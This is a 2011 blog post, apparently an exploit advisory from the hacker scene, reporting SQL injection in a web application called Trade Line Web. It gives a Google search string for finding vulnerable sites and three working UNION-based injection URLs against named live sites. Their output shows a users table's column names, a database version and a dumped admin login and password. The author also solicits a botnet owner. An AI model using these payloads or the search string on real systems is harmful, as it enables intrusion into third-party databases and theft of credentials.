18 Mayıs 2011 Çarşamba

Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
Special greetz to : and Endonesian Backtrack Team - 0nto.me|09exploit.com
My inj3ct0r Brothers.:)
 r0073r (~) Sid3^effectS (~) r4dc0re (~) Indoushka (~) eXeSoul (~) eidelweiss (~) SeeMe (~)
 XroGuE (~) agix (~) KedAns-Dz (~) gunslinger_ (~) Sn!pEr.S!Te (~) ZoRLu (~) anT!-Tr0J4n
--------------------------------------------------------
Note:' i Need botnet Owner friend! '
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Trade Line Web
|~Price : N/A
|~Version : N/A
|~Software: http://www.tradelineweb.com/
|~Vulnerability Style : SQL INJECTION
|~Vulnerability Dir : /
|~Google Keyword : "Trade Line Web" inurl:detay.php
|[~]Date : "19.05.2011"
|[~]Tested on :
DEMOS
----------------------------------------------------------
urunler.php <= 'ID' Functions Not Security
detay.php <= 'ID' Functions Not Security
---------------------------------------------------------
                 Example| Exploitation
                  
                  
                 SQL Injecting..
                 Target : http://www.chickenstrade.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x7573657273&tur=urun
                 Mysql Writes: id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan
 
                    Hm... ok.
                     
                 SQL Injecting..
                 Target : http://www.parkdijital.com/urunler.php?kat_id=8%20and%201=1%20union%20select%201,group_concat%28id,0x3a,username,0x3a,password%29,3,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1
                 Mysql Writes: 1:admin:12345
                    
                    Hmm... ok.
                   
                 SQL Injecting..
                 Target : http://www.kececigroup.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1&tur=urun
                 Mysql Writes : 5.0.90
 
    ================================================================
Gönderen KnocKout zaman: 16:28

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)